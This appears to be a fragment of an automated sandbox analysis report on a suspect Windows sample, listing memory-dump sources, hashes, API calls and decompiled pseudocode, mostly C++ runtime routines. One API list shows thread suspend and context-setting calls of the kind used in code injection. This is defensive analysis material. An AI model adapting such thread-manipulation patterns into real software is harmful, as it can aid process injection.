                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                                                                                                                                                        • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                                                        • Opcode ID: 756139033161687e550d9541d2524eb2eff1a597f9511a81c4fde0575bc7e0d7
                                                                                                                                                                                                                                                                                                        • Instruction ID: ef3b838a98193b55f08c49d8b0fc514e0a3e67fb2db7d4b76ec295deae68d403
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 756139033161687e550d9541d2524eb2eff1a597f9511a81c4fde0575bc7e0d7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91816EB1D40228EBEF25DF90DC88BE9BBB5BB48305F1045CAE21AA7281D7745B84CF55
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                                        			E00417503() {
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				char** _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char* _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				char _v76;
                                                                                                                                                                                                                                                                                                        				char _v80;
                                                                                                                                                                                                                                                                                                        				char* _v84;
                                                                                                                                                                                                                                                                                                        				char* _v88;
                                                                                                                                                                                                                                                                                                        				char* _v96;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                                                                        				char _v104;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        				char* _t81;
                                                                                                                                                                                                                                                                                                        				char* _t92;
                                                                                                                                                                                                                                                                                                        				char* _t94;
                                                                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t109;
                                                                                                                                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                                                                                                                        				char** _t116;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				asm("adc al, 0x42");
                                                                                                                                                                                                                                                                                                        				es = _t114;
                                                                                                                                                                                                                                                                                                        				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                                                                                                                                        				_t116 = _t115 - 0x68;
                                                                                                                                                                                                                                                                                                        				_v48 =  &_v12;
                                                                                                                                                                                                                                                                                                        				 *_t116 =  &_v80;
                                                                                                                                                                                                                                                                                                        				_v56 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v52 = 0x4191dc;
                                                                                                                                                                                                                                                                                                        				_v44 = E00417690;
                                                                                                                                                                                                                                                                                                        				_v40 = _t116;
                                                                                                                                                                                                                                                                                                        				E0040E1A0(_t103 + _t103, _t107, _t114);
                                                                                                                                                                                                                                                                                                        				if( *0x41ea6c != 0) {
                                                                                                                                                                                                                                                                                                        					_v100 = 0x1d;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "terminate called recursively\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					abort();
                                                                                                                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                                                                                                                        					 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        					free(??);
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					_v76 = 1;
                                                                                                                                                                                                                                                                                                        					E004189C0();
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        					fputs(??, ??);
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_v100 = 2;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "\'\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					if(_v16 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *0x41ea6c = 1;
                                                                                                                                                                                                                                                                                                        				_t71 = E00418390();
                                                                                                                                                                                                                                                                                                        				if(_t71 == 0) {
                                                                                                                                                                                                                                                                                                        					_v100 = 0x2d;
                                                                                                                                                                                                                                                                                                        					_v104 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t116 = "terminate called without an active exception\n";
                                                                                                                                                                                                                                                                                                        					_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        					_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						abort();
                                                                                                                                                                                                                                                                                                        						E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        						E0040E810();
                                                                                                                                                                                                                                                                                                        						_t107 = _t107 - 1;
                                                                                                                                                                                                                                                                                                        						 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        						if(_t107 != 0) {
                                                                                                                                                                                                                                                                                                        							E00418140(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        							_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t81 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t102, _t112, _t113, _t114))) + 8))();
                                                                                                                                                                                                                                                                                                        							_t109 = __imp___iob;
                                                                                                                                                                                                                                                                                                        							_v100 = 0xb;
                                                                                                                                                                                                                                                                                                        							_v104 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t116 = "  what():  ";
                                                                                                                                                                                                                                                                                                        							_v76 = 2;
                                                                                                                                                                                                                                                                                                        							_v88 = _t81;
                                                                                                                                                                                                                                                                                                        							_t51 = _t109 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        							_v96 = _t51;
                                                                                                                                                                                                                                                                                                        							fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t107 = __imp___iob;
                                                                                                                                                                                                                                                                                                        							_t53 = _t107 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        							_v104 = _t53;
                                                                                                                                                                                                                                                                                                        							 *_t116 = _v88;
                                                                                                                                                                                                                                                                                                        							fputs(??, ??);
                                                                                                                                                                                                                                                                                                        							 *_t116 = 0xa;
                                                                                                                                                                                                                                                                                                        							_v104 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        							fputc(??, ??);
                                                                                                                                                                                                                                                                                                        							E004183F0(_t102, _t112, _t113, _t114);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v100 = 0;
                                                                                                                                                                                                                                                                                                        				_v104 = 0;
                                                                                                                                                                                                                                                                                                        				_t92 =  *((intOrPtr*)(_t71 + 4)) + (0 |  *((char*)( *((intOrPtr*)(_t71 + 4)))) == 0x0000002a);
                                                                                                                                                                                                                                                                                                        				_v84 = _t92;
                                                                                                                                                                                                                                                                                                        				 *_t116 = _t92;
                                                                                                                                                                                                                                                                                                        				_v96 =  &_v16;
                                                                                                                                                                                                                                                                                                        				_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				_t94 = E0040C8A0();
                                                                                                                                                                                                                                                                                                        				_v100 = 0x30;
                                                                                                                                                                                                                                                                                                        				_v104 = 1;
                                                                                                                                                                                                                                                                                                        				 *_t116 = "terminate called after throwing an instance of \'";
                                                                                                                                                                                                                                                                                                        				_v88 = _t94;
                                                                                                                                                                                                                                                                                                        				_v96 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        				_v104 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				if(_v16 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v76 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				 *_t116 = _v84;
                                                                                                                                                                                                                                                                                                        				fputs(??, ??);
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}































                                                                                                                                                                                                                                                                                                        0x00417503
                                                                                                                                                                                                                                                                                                        0x00417508
                                                                                                                                                                                                                                                                                                        0x00417509
                                                                                                                                                                                                                                                                                                        0x00417511
                                                                                                                                                                                                                                                                                                        0x00417518
                                                                                                                                                                                                                                                                                                        0x00417520
                                                                                                                                                                                                                                                                                                        0x00417523
                                                                                                                                                                                                                                                                                                        0x0041752b
                                                                                                                                                                                                                                                                                                        0x00417533
                                                                                                                                                                                                                                                                                                        0x0041753b
                                                                                                                                                                                                                                                                                                        0x0041753f
                                                                                                                                                                                                                                                                                                        0x0041754b
                                                                                                                                                                                                                                                                                                        0x00417652
                                                                                                                                                                                                                                                                                                        0x0041765a
                                                                                                                                                                                                                                                                                                        0x00417662
                                                                                                                                                                                                                                                                                                        0x0041766c
                                                                                                                                                                                                                                                                                                        0x00417670
                                                                                                                                                                                                                                                                                                        0x00417678
                                                                                                                                                                                                                                                                                                        0x0041767d
                                                                                                                                                                                                                                                                                                        0x00417682
                                                                                                                                                                                                                                                                                                        0x00417686
                                                                                                                                                                                                                                                                                                        0x00417689
                                                                                                                                                                                                                                                                                                        0x00417632
                                                                                                                                                                                                                                                                                                        0x00417632
                                                                                                                                                                                                                                                                                                        0x0041763a
                                                                                                                                                                                                                                                                                                        0x0041763f
                                                                                                                                                                                                                                                                                                        0x00417643
                                                                                                                                                                                                                                                                                                        0x00417646
                                                                                                                                                                                                                                                                                                        0x004175fb
                                                                                                                                                                                                                                                                                                        0x00417600
                                                                                                                                                                                                                                                                                                        0x00417608
                                                                                                                                                                                                                                                                                                        0x00417610
                                                                                                                                                                                                                                                                                                        0x0041761a
                                                                                                                                                                                                                                                                                                        0x0041761e
                                                                                                                                                                                                                                                                                                        0x00417626
                                                                                                                                                                                                                                                                                                        0x00417630
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00417630
                                                                                                                                                                                                                                                                                                        0x00417551
                                                                                                                                                                                                                                                                                                        0x00417558
                                                                                                                                                                                                                                                                                                        0x0041755f
                                                                                                                                                                                                                                                                                                        0x004176b0
                                                                                                                                                                                                                                                                                                        0x004176b8
                                                                                                                                                                                                                                                                                                        0x004176c0
                                                                                                                                                                                                                                                                                                        0x004176ca
                                                                                                                                                                                                                                                                                                        0x004176ce
                                                                                                                                                                                                                                                                                                        0x004176d6
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176e3
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176f1
                                                                                                                                                                                                                                                                                                        0x004176f9
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x00417705
                                                                                                                                                                                                                                                                                                        0x00417708
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x00417790
                                                                                                                                                                                                                                                                                                        0x00417795
                                                                                                                                                                                                                                                                                                        0x0041779d
                                                                                                                                                                                                                                                                                                        0x0041770d
                                                                                                                                                                                                                                                                                                        0x00417716
                                                                                                                                                                                                                                                                                                        0x00417719
                                                                                                                                                                                                                                                                                                        0x0041771f
                                                                                                                                                                                                                                                                                                        0x00417727
                                                                                                                                                                                                                                                                                                        0x0041772f
                                                                                                                                                                                                                                                                                                        0x00417736
                                                                                                                                                                                                                                                                                                        0x0041773e
                                                                                                                                                                                                                                                                                                        0x00417742
                                                                                                                                                                                                                                                                                                        0x00417745
                                                                                                                                                                                                                                                                                                        0x00417749
                                                                                                                                                                                                                                                                                                        0x0041774e
                                                                                                                                                                                                                                                                                                        0x00417754
                                                                                                                                                                                                                                                                                                        0x00417757
                                                                                                                                                                                                                                                                                                        0x0041775f
                                                                                                                                                                                                                                                                                                        0x00417762
                                                                                                                                                                                                                                                                                                        0x0041776c
                                                                                                                                                                                                                                                                                                        0x00417776
                                                                                                                                                                                                                                                                                                        0x0041777a
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x0041756d
                                                                                                                                                                                                                                                                                                        0x00417575
                                                                                                                                                                                                                                                                                                        0x00417580
                                                                                                                                                                                                                                                                                                        0x00417584
                                                                                                                                                                                                                                                                                                        0x0041758c
                                                                                                                                                                                                                                                                                                        0x0041758f
                                                                                                                                                                                                                                                                                                        0x00417593
                                                                                                                                                                                                                                                                                                        0x0041759b
                                                                                                                                                                                                                                                                                                        0x004175a3
                                                                                                                                                                                                                                                                                                        0x004175a8
                                                                                                                                                                                                                                                                                                        0x004175b0
                                                                                                                                                                                                                                                                                                        0x004175b8
                                                                                                                                                                                                                                                                                                        0x004175bf
                                                                                                                                                                                                                                                                                                        0x004175cb
                                                                                                                                                                                                                                                                                                        0x004175cf
                                                                                                                                                                                                                                                                                                        0x004175e1
                                                                                                                                                                                                                                                                                                        0x004175e5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004175eb
                                                                                                                                                                                                                                                                                                        0x004175f3
                                                                                                                                                                                                                                                                                                        0x004175f6
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fwrite$fputs$abort$fputcfree
                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                        • API String ID: 4137898067-2547889144
                                                                                                                                                                                                                                                                                                        • Opcode ID: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c812a2032c8a6cafb97bb0affd1969c62a9733217d5893787fd2abbdd02fbd7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 966f110e3c9d267f337fade52bea464849e19c7eb2c2cc53f5eb6382d29f39a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9551F8B15083418FD310EF2AC54524ABBE0BF84328F448E2EE4E89B391D77D94858F8B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetHandleInformation.KERNEL32 ref: 00412432
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32 ref: 00412492
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 004124A5
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32 ref: 004124F7
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 0041250A
                                                                                                                                                                                                                                                                                                        • SuspendThread.KERNEL32 ref: 00412560
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32 ref: 00412575
                                                                                                                                                                                                                                                                                                        • GetThreadContext.KERNEL32 ref: 00412592
                                                                                                                                                                                                                                                                                                        • SetThreadContext.KERNEL32(00000000,00000000), ref: 004125AE
                                                                                                                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 004125D7
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 004125E8
                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 004125FD
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$EventIncrementInterlocked$Context$HandleInformationObjectResumeSingleSuspendWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2723890135-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a0950f165c45e38fbf2d56c6a54e5c88b37052457152439e3475d81f3650815
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d441bca5eadad69311df4c4c38cd50fc579d132488665014020032ead98f36e8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A16180B06042009FCB10EF74DA886AABFF4EF04350F51496EEC95DB245D7B8D891CB6A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • calloc.MSVCRT ref: 004160BA
                                                                                                                                                                                                                                                                                                        • CreateSemaphoreA.KERNEL32 ref: 0041610E
                                                                                                                                                                                                                                                                                                        • CreateSemaphoreA.KERNEL32 ref: 00416135
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00416154
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 0041615F
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 0041616A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                                                                                                                                                                                                                                                                                        • String ID: l
                                                                                                                                                                                                                                                                                                        • API String ID: 2075313795-2517025534
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e8c05b3caea3bf66dc60917ec76161f1da9a774c5b16c6f9788cc368daaae04
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe2c2a01c5c15917ad31e2f0a7fff83a2914711dd0c11e703da6f936851018ed
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E63108B45043049FEB10BF69C58835ABBE4EF40314F15896DDC988B38AE779D498CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3227561178-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4bf978c0dfbcc7ac22944fa4be84535112569abd23369c40f2ce7a8460ac5efa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0781F5B06047058FD720DF69D68879ABBF0BB04310F104A2EE996C7790D378E895CF96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 23%
                                                                                                                                                                                                                                                                                                        			E00416640(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char* _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				char* _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				int _v56;
                                                                                                                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                                                                                                                        				char* _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                                                                                                                        				char* _t41;
                                                                                                                                                                                                                                                                                                        				int _t43;
                                                                                                                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t75;
                                                                                                                                                                                                                                                                                                        				char* _t77;
                                                                                                                                                                                                                                                                                                        				int _t79;
                                                                                                                                                                                                                                                                                                        				int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                                                                        				char** _t83;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t88;
                                                                                                                                                                                                                                                                                                        				char** _t89;
                                                                                                                                                                                                                                                                                                        				char** _t90;
                                                                                                                                                                                                                                                                                                        				char** _t91;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t79 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t83 = _t82 - 0x2c;
                                                                                                                                                                                                                                                                                                        				_t75 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_t75 == 0) {
